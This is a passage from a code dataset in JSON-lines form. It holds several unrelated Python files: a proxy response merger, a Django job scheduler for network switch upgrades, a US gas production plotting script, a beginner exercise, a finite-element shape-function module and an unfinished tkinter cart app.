start merge\r\n for matchResults in result_body['data']['matchResults']:\r\n key_id = CompareProxyResponseHandler.get_key_id_in_match_result(matchResults)\r\n merge_match_results[key_id] = matchResults\r\n for matchResults in body_tobe_merge_dict['data']['matchResults']:\r\n key_id = CompareProxyResponseHandler.get_key_id_in_match_result(matchResults)\r\n if key_id in merge_match_results:\r\n merge_match_results[key_id]['topIds'] = merge_match_results[key_id]['topIds'] + matchResults['topIds']\r\n else:\r\n merge_match_results[key_id] = matchResults\r\n\r\n # sort by score\r\n def take_score(arr):\r\n return float(arr['matchingScore'])\r\n\r\n for node in merge_match_results.values():\r\n node['topIds'].sort(key=take_score, reverse=True)\r\n node['topIds'] = node['topIds'][0:top_n]\r\n result_body['data']['matchResults'] = list(merge_match_results.values())\r\n logging.error(json.dumps(result_body))\r\n return result_body\r\n\r\n @staticmethod\r\n def merge_proxy_detail(body, proxy_detail):\r\n body['proxy_detail'] = proxy_detail\r\n return body\r\n\r\n @staticmethod\r\n def get_key_id_in_match_result(match_result):\r\n key_id = 1\r\n if 'compareId' in match_result:\r\n key_id = match_result['compareId']\r\n if 'channelId' in match_result:\r\n key_id = match_result['channelId']\r\n return key_id\r\n","repo_name":"Prymon/simple-url-proxy","sub_path":"seemmo/response/compareProxyResponseHandler.py","file_name":"compareProxyResponseHandler.py","file_ext":"py","file_size_in_byte":6387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3036375808","text":"from django.db.models import Q\nfrom django.db.models import F\nfrom django.utils import timezone\nimport os\n\nimport celery_tasks\nfrom celery import result\nfrom constants import *\nimport datetime\nfrom image.models import ImageProfile\nfrom image import image_profile\nfrom ignite.settings import MEDIA_ROOT\nimport group\nfrom models import *\nimport pytz\nimport string\nfrom utils.exception import IgniteException\nfrom utils.utils import parse_file\nfrom utils.encrypt import decrypt_data\nimport logging\nlogger = logging.getLogger(__name__)\n\n\ndef get_all_job():\n return Job.objects.all()\n\n\ndef ref_count_delete(job):\n for grp in job.tasks:\n value = -1\n Group.objects.filter(pk=grp[GROUP_ID]).update(ref_count=F('ref_count')+value)\n\n\ndef ref_count_add(grp):\n value = 1\n Group.objects.filter(pk=grp.id).update(ref_count=F('ref_count')+value)\n\n\ndef get_image_details(img):\n image = {}\n image['profile_name'] = img.profile_name\n image['system_image'] = img.system_image\n image['id'] = img.id\n image['image_server_ip'] = img.image_server_ip\n image['image_server_username'] = img.image_server_username\n image['image_server_password'] = img.image_server_password\n image['is_encrypted'] = img.is_encrypted\n image['access_protocol'] = img.access_protocol\n\n return image\n\n\ndef fill_param_values(params):\n parameters = {}\n if len(params):\n\n for param in params:\n if param[PARAM_TYPE] == FIXED:\n parameters[param[PARAM_NAME]] = param[PARAM_VAL]\n\n if param[PARAM_TYPE] == IMAGE_PROFILE:\n img = image_profile.get_profile(param[PARAM_VAL])\n parameters[param[PARAM_NAME]] = get_image_details(img)\n\n if param[PARAM_TYPE] == EVAL:\n try:\n parameters[param[PARAM_NAME]] = eval(param[PARAM_VALUE])\n except SyntaxError:\n raise IgniteException(\"%s = %s\" % (ERR_EVAL_SYNTAX,\n param[PARAM_VALUE]))\n return parameters\n\n\ndef tasks_validation(data, options, job):\n from 
celery_tasks import get_all_switches\n tsk = []\n if len(data) == 0:\n raise IgniteException(\"Job cannot have empty task sequence\")\n if options == \"update\":\n ref_count_delete(job)\n for task in data:\n try:\n grp = group.get_group(task[GROUP_ID])\n img = image_profile.get_profile(task[IMAGE_ID])\n if options != 'get' and img.system_image == None:\n raise IgniteException(\"No system image is found in the image profile: \" + img.profile_name)\n if options != 'get' and task['type'] == 'epld_upgrade' and img.epld_image == None:\n raise IgniteException(\"No epld image is found in the image profile: \" + img.profile_name)\n if task['type'] in ['epld_upgrade', 'switch_upgrade']:\n if options != 'get' and img.access_protocol != 'scp':\n raise IgniteException(\"Only scp protocol is supported for image profile: \" + img.profile_name)\n task[\"switch_count\"] = len(grp.switch_list)\n # False is to say not to decrypt passwords\n switches = get_all_switches(task, False)\n task['group']['switches'] = switches\n task[IMAGE_NAME] = img.profile_name\n\n if task['type'] != 'custom':\n task['task_params'] = {}\n image = get_image_details(img)\n if task['type'] == 'epld_upgrade':\n image['epld_image'] = img.epld_image\n task['task_params']['image'] = image\n\n if task['type'] == 'custom':\n if task['file_name'] is None and task['function'] is None:\n raise IgniteException(\"Please Provide file/function name Custom task\")\n try:\n task['parameters'] = fill_param_values(task['params'])\n except:\n raise IgniteException(ERR_IN_PARAMS)\n\n tsk.append(task)\n if options != \"get\":\n ref_count_add(grp)\n except Group.DoesNotExist as e:\n raise IgniteException(\"Group id \"+str(task[GROUP_ID])+\" not found\")\n except ImageProfile.DoesNotExist as e:\n raise IgniteException(\"Image id \"+str(task[IMAGE_ID])+\" not found\")\n return tsk\n\n\ndef add_job(data, user):\n tsk = tasks_validation(data[\"tasks\"], \"add\", 0)\n jb = Job()\n jb.name = data[\"name\"]\n date_time = datetime.datetime.strptime(data[\"schedule\"], \"%Y-%m-%dT%H:%M:%S\")\n cur_time = datetime.datetime.utcnow()\n if cur_time >= date_time:\n raise IgniteException(\"schedule time has elapsed\")\n# set timezone information\n date_time = timezone.make_aware(date_time, pytz.timezone('UTC'))\n jb.schedule = date_time\n jb.tasks = data[\"tasks\"]\n jb.updated_by = user\n jb.save()\n# create celery task\n jb.task_id = celery_tasks.run_single_job.apply_async([jb.id, jb.schedule], eta=jb.schedule)\n jb.save()\n jb.tasks = tsk\n return jb\n\n\ndef get_job(id):\n jb = Job.objects.get(pk=id)\n if jb.status in ['SCHEDULED', 'RUNNING']:\n tsk = tasks_validation(jb.tasks, \"get\", 0)\n jb.tasks = tsk\n return jb\n\n\ndef assert_django_job(status, option):\n if not status == 'SCHEDULED':\n if status == 'RUNNING':\n raise IgniteException(\"Job is running\")\n elif option == \"update\":\n raise IgniteException(\"Job is completed\")\n\n\ndef update_job(id, data, user):\n jb = Job.objects.get(pk=id)\n assert_django_job(jb.status, \"update\")\n tsk = tasks_validation(data[\"tasks\"], \"update\", jb)\n jb.name = data[\"name\"]\n date_time = datetime.datetime.strptime(data[\"schedule\"], \"%Y-%m-%dT%H:%M:%S\")\n cur_time = datetime.datetime.utcnow()\n if cur_time >= date_time:\n raise IgniteException(\"Schedule time has elapsed\")\n# set timezone information\n date_time = timezone.make_aware(date_time, pytz.timezone('UTC'))\n res = result.AsyncResult(jb.task_id)\n res.revoke()\n jb.schedule = date_time\n jb.tasks = data[\"tasks\"]\n jb.updated_by = user\n 
jb.task_id = celery_tasks.run_single_job.apply_async([jb.id, jb.schedule], eta=jb.schedule).task_id\n jb.save()\n jb.tasks = tsk\n return jb\n\n\ndef delete_job(id):\n jb = Job.objects.get(pk=id)\n assert_django_job(jb.status, \"delete\")\n if jb.status == \"SCHEDULED\":\n res = result.AsyncResult(jb.task_id)\n res.revoke()\n ref_count_delete(jb)\n jb.delete()\n\n\ndef get_scripts():\n fNames = os.listdir(os.path.join(MEDIA_ROOT, 'custom'))\n pynames = []\n for name in fNames:\n if name.endswith('.py'):\n pynames.append(name)\n return pynames\n\n\ndef get_clone_task(tasks):\n new_task = []\n\n for task in tasks:\n tsk = {}\n tsk[GROUP_ID] = task[GROUP_ID]\n tsk[IMAGE_ID] = task[IMAGE_ID]\n tsk[IMAGE_NAME] = task[IMAGE_NAME]\n tsk[RETRY_COUNT] = task[RETRY_COUNT]\n tsk[RUN_SIZE] = task[RUN_SIZE]\n tsk[TYPE] = task[TYPE]\n tsk[FAILURE_ACTION_GRP] = task[FAILURE_ACTION_GRP]\n tsk[FAILURE_ACTION_IND] = task[FAILURE_ACTION_IND]\n if task[TYPE] == \"custom\":\n tsk[FILE_NAME] = task[FILE_NAME]\n tsk[FUNCTION] = task[FUNCTION]\n tsk[PARAMS] = task[PARAMS]\n grp = {}\n grp[GROUP_NAME] = task[GROUP][GROUP_NAME]\n grp[USERNAME] = task[GROUP][USERNAME]\n grp[PASSWORD] = task[GROUP][PASSWORD]\n tsk[GROUP] = grp\n new_task.append(tsk)\n return new_task\n\ndef clone_job(data, id, username=''):\n job = Job.objects.get(id=id)\n tasks = get_clone_task(job.tasks)\n\n new_job = Job()\n new_job.name = data[\"name\"]\n date_time = datetime.datetime.strptime(data[\"schedule\"], \"%Y-%m-%dT%H:%M:%S\")\n cur_time = datetime.datetime.utcnow()\n if cur_time >= date_time:\n raise IgniteException(\"schedule time has elapsed\")\n # set timezone information\n date_time = timezone.make_aware(date_time, pytz.timezone('UTC'))\n new_job.schedule = date_time\n new_job.updated_by = username\n tsk = tasks_validation(tasks, \"add\", 0)\n new_job.tasks = tasks\n new_job.save()\n new_job.task_id = celery_tasks.run_single_job.apply_async([new_job.id, new_job.schedule], eta=new_job.schedule)\n new_job.save()\n new_job.tasks = tsk\n return new_job\n","repo_name":"datacenter/ignite-DEPRECATED","sub_path":"group/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":8384,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"3"} +{"seq_id":"37055057395","text":"from US_Utilities import *\r\n\r\nYear = np.linspace( 1994, 2040, 47)\r\nsum_EIA = np.zeros( len( Year))\r\nsum_HP = np.zeros( len( Year))\r\nsum_HA = np.zeros( len( Year))\r\nsum_WP = np.ones( len( Year)) * 20000\r\nsum_WA = np.ones( len( Year)) * 20000\r\nf1_Barnett = GetFile( \"./Data/US01_Barnett_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA)\r\nf2_Marcellus = GetFile( \"./Data/US02_Marcellus_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA)\r\nf3_Haynesville = GetFile( \"./Data/US03_Haynesville_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA)\r\nf4_EagleFord = GetFile( \"./Data/US04_EagleFord_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA)\r\nf5_Fayetteville = GetFile( \"./Data/US05_Fayetteville_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA)\r\nf6_Woodford = GetFile( \"./Data/US06_Woodford_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA)\r\nf7_Bakken = GetFile( \"./Data/US07_Bakken_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA)\r\nf8_Haynesville = GetFile( \"./Data/US08_Utica_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA, proj_name=\"Yakimov2017\")\r\nf9_Others = GetFile( \"./Data/US09_Others_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA)\r\nfor i in range( 6):\r\n sum_HP[i] += 19.6\r\n 
sum_HA[i] += 19.6\r\n\r\nPrediction_T = np.linspace( 2017, 2100, 84)\r\nPrediction_Conventional = Hubbert( 2000, 1, .085, 705).GetVector( Prediction_T)\r\nPrediction_TG_Huges = Hubbert( 2016, 1, .07, 428).GetVector( Prediction_T)\r\nPrediction_TG_EIA = Hubbert( 2042, .07, .5, 820).GetVector( Prediction_T)\r\nPrediction_Total_Huges = Prediction_Conventional/1.1 + Prediction_TG_Huges \r\nPrediction_Total_EIA = Prediction_Conventional/1.1 + Prediction_TG_EIA\r\n\r\nEIA_Year, EIA_Withdrawals, EIA_Repress, EIA_VnF, EIA_GW, EIA_OW, EIA_TG, EIA_CBM, EIA_dry, EIA_Marketed = Load_Calibration(\r\n \"./Data/US11_US_Gas_EIA.csv\",\r\n [\"year\", \"gross\", \"repress\", \"vnf\", \"gas_wells\", \"oil_wells\", \"TG_wells\", \"CBM_wells\", \"dry\", \"marketed\"])\r\nmfty2bmy = 0.3048**3/1000\r\nEIA_Withdrawals *= mfty2bmy\r\nEIA_Repress *= mfty2bmy\r\nEIA_VnF *= mfty2bmy\r\nEIA_GW *= mfty2bmy\r\nEIA_OW *= mfty2bmy\r\nEIA_TG *= mfty2bmy\r\nEIA_CBM *= mfty2bmy\r\nEIA_dry *= mfty2bmy\r\nEIA_Marketed *= mfty2bmy\r\nEIA_Extracted = EIA_Withdrawals - EIA_Repress\r\nEIA_Production = EIA_Extracted - EIA_VnF \r\n\r\nfor i in range( len(EIA_CBM)):\r\n if EIA_GW[i] < 0: EIA_GW[i] = 0\r\n if EIA_OW[i] < 0: EIA_OW[i] = 0\r\n if EIA_TG[i] < 0: EIA_TG[i] = 0\r\n if EIA_CBM[i] < 0: EIA_CBM[i] = 0\r\nfor i in range( 36):\r\n EIA_Production[i] = EIA_Marketed[i] \r\n EIA_dry[i] = EIA_Marketed[i] \r\n EIA_Extracted[i] = EIA_Marketed[i] * 1.1\r\n EIA_Withdrawals[i] = EIA_Marketed[i] * 1.1 \r\n \r\nfig = plt.figure( figsize=(15,10))\r\nfig.suptitle( 'Добыча природного газа в США', fontsize=22)\r\ngs = plt.GridSpec(2, 1, height_ratios=[2, 1]) \r\nax1 = plt.subplot(gs[0])\r\nax2 = plt.subplot(gs[1])\r\n\r\nax1.plot( EIA_Year, EIA_Withdrawals, \"-\", lw=1, color='r', label=\"Добыча всего ({:.1f} 10¹² м³)\".format(np.sum(EIA_Withdrawals[:-1])/1000))\r\nax1.plot( EIA_Year[:-1], EIA_Extracted[:-1], \"-\", lw=3, color='r', label=\"Минус закачка ({:.1f} 10¹² м³)\".format(np.sum(EIA_Extracted[:-1])/1000))\r\nax1.plot( EIA_Year[:-1], EIA_Production[:-1], \"-\", lw=2, color='k', label=\"Минус факел ({:.1f} 10¹² м³)\".format(np.sum(EIA_Production[:-1])/1000))\r\nax1.plot( EIA_Year, EIA_dry, \"-\", lw=2, color='b', label=\"Минус НСГ и NGPL ({:.1f} 10¹² м³)\".format(np.sum(EIA_dry[:-1])/1000))\r\nax1.errorbar( Year[:-24], sum_HA[:-24], yerr=sum_HA[:-24]*.05, fmt='o', color=\"k\", label='Газ \"сланцевых\" месторождений')\r\nax1.set_xlim( 1910, 2020)\r\nax1.set_ylim( 0, 1100)\r\nax1.set_ylabel(\"Млрд м³ в год\")\r\nax1.grid(True)\r\nax1.set_title( \"Добыча газа\")\r\nax1.legend(loc=0)\r\n#ax1.annotate(\"Пик добычи в 2018 г\", xy=(2015, 929), xytext=(1970, 1000), arrowprops=dict(facecolor='black', shrink=0.05))\r\n\r\nax2.plot( EIA_Year[67:-1], EIA_GW[67:-1], \"-\", lw=3, color='r', label='\"Классический\" газ')\r\nax2.plot( EIA_Year[67:-1], EIA_OW[67:-1], \"-\", lw=3, color='g', label='Попутный газ')\r\nax2.plot( EIA_Year[67:-1], EIA_CBM[67:-1], \"-\", lw=3, color='k', label='Рудничный газ')\r\nax2.plot( EIA_Year[67:-1], EIA_TG[67:-1], \"-\", lw=3, color='m', label='Трудноизвлекаемый газ')\r\nax2.plot( Year[:-24], sum_HA[:-24], \"--\", lw=1, color='m', label='В том числе \"сланцевых\"')\r\nax2.set_xlim( 1910, 2020)\r\nax2.set_ylim( 0, 600)\r\nax2.set_xlabel(\"Годы\")\r\nax2.set_ylabel(\"Млрд м³ в год\")\r\nax2.grid(True)\r\nax2.set_title( \"Добыча по типу местрождения\")\r\nax2.legend(loc=0)\r\nax2.annotate(\"Пик добычи в 1973 г\", xy=(1973, 550), xytext=(1960, 300), arrowprops=dict(facecolor='black', shrink=0.05))\r\nax2.annotate(\"Падение 
добычи по 4.8% в год\", xy=(2009, 387), xytext=(1970, 250), arrowprops=dict(facecolor='black', shrink=0.05))\r\n\r\nplt.savefig( \"./Graphs/figure_11_11.png\")\r\nif InteractiveModeOn: plt.show(True)\r\n","repo_name":"myak555/LIMITS_TO_LIMITS","sub_path":"Chapter 11/11_USA_Gas_History.py","file_name":"11_USA_Gas_History.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"71339482323","text":"soma = 0\nidade_velho = 0\nnome_velho = ''\nmenos_20_anos = 0\n\nfor p in range(1, 5, 1):\n print(f'----- {p}ª PESSOA -----')\n nome = str(input('Nome: ')).strip()\n idade = int(input('Idade: '))\n sexo = str(input('Sexo [M/F]: ')).upper().strip()\n soma += idade\n if sexo == 'F' and idade < 20:\n menos_20_anos += 1\n if sexo == 'M' and idade_velho < idade:\n idade_velho = idade\n nome_velho = nome\n\nmedia = soma / 4\nprint(f'A média de idade do grupo é de {media} anos')\nprint(f'O homem mais velho tem {idade_velho} anos e se chama {nome_velho}.')\nprint(f'Ao todo, são {menos_20_anos} mulheres com menos de 20 anos')\n","repo_name":"josevini/python","sub_path":"Curso de Python/Mundo 2/aula13/ex056.py","file_name":"ex056.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25729651585","text":"#/bin/python3\n\n\n#Numerics\nimport numpy as np\n\n\n\"\"\"\n---------------------------------------------------------------------------------\n| Node function stuff |\n---------------------------------------------------------------------------------\n\"\"\"\n \ndef shape_func(ref_point, node_num : int):\n \"\"\"Returns the value of the specific shape function\n \n Input : xi, eta local coords must be inside a reference triangle with vertices \n (0,0), (1,0), (0,1)\n \n node_num the number of the node as per VTK element 22 numbered 1-6\n \n \"\"\"\n xi, eta = ref_point\n result=None\n if not (1<=node_num<=6):\n raise ValueError(\"Node Numbers are 1 to 6\")\n \n if not(0.<=xi<=1.) or not(0.<=eta<=1.) or (abs(xi)+abs(eta)>1.0):\n raise ValueError( \"Not inside reference triangle\")\n \n\n \n if node_num==1:\n result = (eta+xi-1.)*(2*eta+2*xi-1.) # correct\n \n \n if node_num==2:\n result = xi* (2*xi-1.) # correct\n \n \n if node_num==3:\n result = eta*(2*eta-1.) # correct\n \n \n if node_num==4:\n result = -4*xi*(eta+xi-1.) # correct\n \n \n if node_num==5:\n result = 4*eta*xi # correct\n \n \n if node_num==6:\n result = -4*eta*(eta+xi-1.) # correct\n \n return result\n\ndef shape_func_vec(ref_point):\n \"\"\"Returns the value of the specific shape function\n \n Input : xi, eta local coords must be inside a reference triangle with vertices \n (0,0), (1,0), (0,1)\n \n node_num the number of the node as per VTK element 22 numbered 1-6\n \n \"\"\"\n xi, eta = ref_point\n result=None\n \n if not(0.<=xi<=1.) or not(0.<=eta<=1.) or (abs(xi)+abs(eta)>1.0):\n raise ValueError( \"Not inside reference triangle\")\n \n\n result = np.zeros(6)\n result[0] = (eta+xi-1.)*(2*eta+2*xi-1.) # correct\n result[1] = xi* (2*xi-1.) # correct\n result[2] = eta*(2*eta-1.) # correct\n result[3] = -4*xi*(eta+xi-1.) # correct\n result[4] = 4*eta*xi # correct\n result[5] = -4*eta*(eta+xi-1.) 
# correct\n \n return result\n \ndef shape_func_deriv(ref_point, node:int, deriv_num):\n \"\"\"Returns the value of the derivative of the node shape function\n \n \n Input : xi, eta local coords must be inside a reference triangle with vertices \n (0,0), (1,0), (0,1)\n \n node_num the number of the node as per VTK element 22 numbered 1-6\n \n deriv_num : between 1,2 determines whether we are derivating by xi or eta\n \"\"\"\n \n node_num = node\n xi, eta = ref_point\n result=None\n if not (1<=node_num<=6):\n raise ValueError(\"Node Numbers are 1 to 6\")\n \n if not(0.<=xi<=1.) or not(0.<=eta<=1.) or (abs(xi)+abs(eta)>1.0):\n raise ValueError(\"Not inside reference triangle\")\n \n if deriv_num!=1 and deriv_num!=2:\n raise ValueError( \"Deriv_num must be one or two, not \"+str(deriv_num))\n \n \n if deriv_num==1:\n\n if node_num==1:\n result = (4*xi+4*eta-3.) # correct\n\n\n if node_num==2:\n result = (4*xi-1.) # correct\n\n\n if node_num==3:\n result = 0. # correct\n\n\n if node_num==4:\n result = -4*(2*xi+eta-1) # correct\n\n\n if node_num==5:\n result = 4*eta # correct\n\n\n if node_num==6:\n result = -4*eta # correct\n\n else:\n \n\n if node_num==1:\n result = (4*xi+4*eta-3.) # correct\n\n\n if node_num==2:\n result = 0. # correct\n\n\n if node_num==3:\n result = (4*eta-1.) # correct\n\n\n if node_num==4:\n result = -4*xi # correct\n\n\n if node_num==5:\n result = 4*xi # correct\n\n\n if node_num==6:\n result = -4*(xi+2*eta-1) # correct\n \n return result\n\ndef shape_func_deriv_vec(ref_point):\n \"\"\"Returns the value of the derivative of the node shape function\n \n \n Input : xi, eta local coords must be inside a reference triangle with vertices \n (0,0), (1,0), (0,1)\n \n node_num the number of the node as per VTK element 22 numbered 1-6\n \n deriv_num : between 1,2 determines whether we are derivating by xi or eta\n \"\"\"\n \n \n xi, eta = ref_point\n \n \n \n if not(0.<=xi<=1.) or not(0.<=eta<=1.) or (abs(xi)+abs(eta)>1.0):\n raise ValueError(\"Not inside reference triangle\")\n \n \n result = np.zeros(shape=(6,2))\n \n # xi deriv\n result[0,0] = (4*xi+4*eta-3.) # correct\n result[1,0] = (4*xi-1.) # correct\n result[2,0] = 0. # correct\n result[3,0] = -4*(2*xi+eta-1) # correct\n result[4,0] = 4*eta # correct\n result[5,0] = -4*eta # correct\n\n #eta deriv\n result[0,1] = (4*xi+4*eta-3.) # correct\n result[1,1] = 0. # correct\n result[2,1] = (4*eta-1.) 
# correct\n result[3,1] = -4*xi # correct\n result[4,1] = 4*xi # correct\n result[5,1] = -4*(xi+2*eta-1) # correct\n \n return result\n \ndef local_node_derivs(xi_eta, node_coords):\n \"\"\"Get gradient in local coords, not in reference for the purpose of building the stiffness matrix\n \n \"\"\"\n jac = jacobian(xi_eta, node_coords)\n if np.linalg.det(jac)!= 0:\n jacinv = np.linalg.inv(jac)\n else:\n print(node_coords)\n raise ValueError(\"Jacobian has zero determinant\")\n \n phi_derivs = shape_func_deriv_vec(xi_eta)\n phi_local_deriv = jacinv.dot(phi_derivs.transpose()) # 2x6 matrix\n \n \n return phi_local_deriv.transpose()\n \n \n\n\"\"\"\n---------------------------------------------------------------------------------\n| Mapping function stuff |\n---------------------------------------------------------------------------------\n\"\"\"\n\ndef map_to_local(xi_eta, coeffs):\n \"\"\"Map any reference element coords to the physical element\n \n Input: xi_eta: local coords must be inside a reference triangle with vertices \n (0,0), (1,0), (0,1)\n \n coeffs: numpy array with shape (6,2) where node_coords[0,0] is the \n x coord of the first node\n \n \n Output the x,y coords as numpy array\n \n \"\"\"\n xi, eta = xi_eta\n c1,c2,c3,c4,c5,c6 = coeffs\n res = (2*eta**2*(c1+c3-2*c6) + \n eta*xi*4*(c1-c4+c5-c6)+\n eta*(4*c6-3*c1-c3)+\n 2*xi**2*(c1+c2-2*c4)+\n xi*(4*c4-c2-3*c1)+\n c1)\n \n return res\n \n \ndef jacobian(xi_eta, node_coords):\n \"\"\"Returns the jacobian for the given xi_eta points\n \n Input: xi_eta: local coords must be inside a reference triangle with vertices \n (0,0), (1,0), (0,1)\n \n node_coords: numpy array with shape (6,2) where node_coords[0,0] is the \n x coord of the first node\n \n \"\"\"\n \n jac = np.zeros(shape=(2,2))\n for i in range(6):\n nx = shape_func_deriv(xi_eta, i+1, 1)\n ny = shape_func_deriv(xi_eta, i+1, 2)\n jac[0,0] += nx*node_coords[i,0]\n jac[0,1] += nx*node_coords[i,1]\n jac[1,0] += ny*node_coords[i,0]\n jac[1,1] += ny*node_coords[i,1]\n \n return jac\n \n\"\"\"\n---------------------------------------------------------------------------------\n| Buoyancy Calculations |\n---------------------------------------------------------------------------------\n\"\"\"\n\ndef local_forcing_el( el_node_coords:np.array, int_points:np.array):\n \"\"\"This is used to calculate the buoyancy. 
Will be multiplied later by\n the temperature and expansion coefficient.\n \n Input should be the coordinate of the element nodes (6),\n as well as the gaussian integration points, which should be in format\n (x, y, weight)\n \n Returns the integral of the shape functions over the element for the\n indicator function.\n \"\"\"\n \n\n npoints = int_points.shape[0]\n \n el_vec = np.zeros(6)\n for i in range(npoints):\n det = np.linalg.det(jacobian(int_points[i,:2], el_node_coords))\n el_vec += (shape_func_vec(int_points[i,:2])*int_points[i,-1] *det)\n if det<0.:\n print(\"Negative determinant in element!\" )\n return el_vec\n\n\n\n","repo_name":"marc-git/Navier-Stokes-Fourier-Boussinesq","sub_path":"P2FE.py","file_name":"P2FE.py","file_ext":"py","file_size_in_byte":8695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17061589268","text":"from tkinter import *\nfrom tkinter.ttk import *\nfrom connection import *\n\n\n\nclass addtocart:\n\n def priceClear(self):\n\n self.amountbox=Entry(self.frame3)\n self.gstbox=Entry(self.frame3)\n self.netamntbox=Entry(self.frame3)\n self.amountbox.grid(row=0,column=1)\n self.gstbox.grid(row=1,column=1)\n self.netamntbox.grid(row=2,column=1)\n\n\n # ''''''''''' FRAME 1'''''''\n\n def addMenuItem(self):\n cur = con.cursor()\n query = \"select * from menu \"\n\n cur.execute(query)\n self.data = cur.fetchall()\n print(self.data)\n\n\n self.combobox1 = []\n\n for i in self.data:\n print(i[1])\n print(self.combobox1)\n self.combobox1.append(i[1])\n\n\n print(self.combobox1)\n\n\n\n def quantity(self):\n self.menuQuantity=[]\n for i in range(1,11):\n self.menuQuantity.append(i)\n print(self.menuQuantity)\n\n\n\n def combobox1(self):\n\n self.serial = self.serial + 1\n self.addMenuItem()\n self.Qantity = self.combobox2.get()\n self.MenuNam = self.combobox1.get()\n print(\"Quantity:\" + self.Qantity)\n print(\"Price:\" + str(self.Price))\n self.totalPrice = (int(self.price) * int(self.Qantity))\n print(\"Total Price:\" + str(self.totalPrice))\n self.treeData = [self.SerialNum, self.MenuName, self.Price, self.Qantity, self.TotalPrice]\n self.row = self.row + 1\n self.treeview.insert(\"\", self.row, values=self.treeData)\n\n def priceCalculationBox(self):\n self.priceClear()\n\n self.amountbox['state'] = \"normal\"\n self.gstbox['state'] = \"normal\"\n self.netamntbox['state'] = \"normal\"\n\n\n self.amountbox.insert(0, self.totalAmtVar)\n self.gstbox.insert(0, self.gstAmtVar)\n self.netamntbox.insert(0, self.netAmtVar)\n self.amountbox['state'] = \"readonly\"\n self.gstbox['state'] = \"readonly\"\n self.netamntbox['state'] = \"readonly\"\n\n\n\n\n def fillTreeview(self):\n\n self.resetTreeview()\n\n for i in range(0, len(self.mainList)):\n self.treeview.insert(\"\", i, values=self.mainList[i])\n self.pricecalculation()\n self.priceCalculationBox()\n\n\n def pricecalculation(self):\n\n print(\"MAINLIST\")\n print(self.mainList)\n\n self.totalAmtVar=0\n for i in range(0,len(self.mainList)):\n\n self.totalAmtVar=self.mainList[i][4]+self.totalAmtVar\n\n print(\"Total Amount=\"+str(self.totalAmtVar))\n\n self.gstAmtVar=5*(0.01)\n self.netAmtVar=self.totalAmtVar+(self.totalAmtVar*self.gstAmtVar)\n print(\"Total Net:\"+str(self.netAmtVar))\n\n print(str(self.totalAmtVar))\n print(str(self.gstAmtVar))\n print(str(self.netAmtVar))\n print('Total Amount: ' + str(self.totalAmtVar) + \" \" + str(self.gstAmtVar) + \" \" + str(self.netAmtVar))\n\n\n\n\n\n\n\n\n def addCart(self):\n self.serial = self.serial + 1\n 
self.menuName=self.combobox1.get()\n cur=con.cursor()\n query='select * from menu where name=\"'+self.menuName +'\"'\n print(query)\n cur.execute(query)\n self.data=cur.fetchone()\n self.price=self.data[3]\n self.quantity=self.combobox2.get()\n self.totalPrice=(int(self.price)*int(self.quantity))\n\n print(\"SERIAL NUMBER:\"+str(self.serial)+\" Menu Name:\"+self.menuName+\"--Price:\"+str(self.price)+\"--Quantity:\"+str(self.quantity)+\"--Self.totalPrice\"+str(self.totalPrice))\n self.sublist=[self.serial,self.menuName,self.price,self.quantity,self.totalPrice]\n print(self.sublist)\n\n self.mainList.append(self.sublist)\n\n print(\"MAIN LIST:\")\n print(self.mainList)\n self.fillTreeview()\n\n\n\n\n\n\n def resetTreeview(self):\n\n for i in self.treeview.get_children():\n self.treeview.delete(i)\n\n\n # '''''''INSERT IN FRAME 3 PRICE CALCULATION''''\n\n\n\n def __init__(self):\n\n self.mainList=[]\n\n\n self.serial = 0\n self.row = 0\n self.window=Tk()\n self.frame1=PanedWindow()\n self.addMenuItem()\n self.quantity()\n self.slctname=Label(self.frame1,text=\"SELECT NAME\")\n self.combobox1=Combobox(self.frame1,value=self.combobox1,state=\"readonly\")\n\n\n\n\n\n self.slctquantity=Label(self.frame1,text=\"SELECT QUANTITY\")\n self.combobox2=Combobox(self.frame1,value=self.menuQuantity)\n\n\n\n self.addbttn=Button(self.frame1,text=\"ADD TO CART\",command=self.addCart)\n\n\n self.slctname.grid(row=0,column=0)\n self.combobox1.grid(row=0,column=1)\n\n\n self.slctquantity.grid(row=0,column=2)\n self.combobox2.grid(row=0,column=3)\n\n\n self.addbttn.grid(row=0,column=4)\n\n\n\n\n\n\n # '''''''''''''FRAME 2'''''\n\n self.frame2=PanedWindow()\n\n\n\n self.treeview=Treeview(self.frame2,column=(\"SerialNum\",\"MenuName\",\"Price\",\"Qantity\",\"TotalPrice\"))\n self.treeview.heading(\"SerialNum\",text=\"SERIAL NUMBER\")\n self.treeview.heading(\"MenuName\",text=\"MENU NAME\")\n self.treeview.heading(\"Price\",text=\"PRICE\")\n self.treeview.heading(\"Qantity\",text=\"QUANTITY\")\n self.treeview.heading(\"TotalPrice\",text=\"TOTAL PRICE\")\n\n self.treeview[\"show\"]=\"headings\"\n\n\n\n\n self.treeview.pack()\n\n\n\n\n\n\n # '''''''''''''FRAME 3'''''''''''''''''\n\n\n self.frame3=Tk()\n\n self.frame3=PanedWindow()\n\n self.totalAmnt=Label(self.frame3,text=\"TOTAL AMOUNT\")\n self.gst=Label(self.frame3,text=\"GST\")\n self.netAmnt=Label(self.frame3,text=\"NET AMOUNT\")\n\n\n\n\n\n\n self.totalAmnt.grid(row=0,column=0)\n self.gst.grid(row=1,column=0)\n 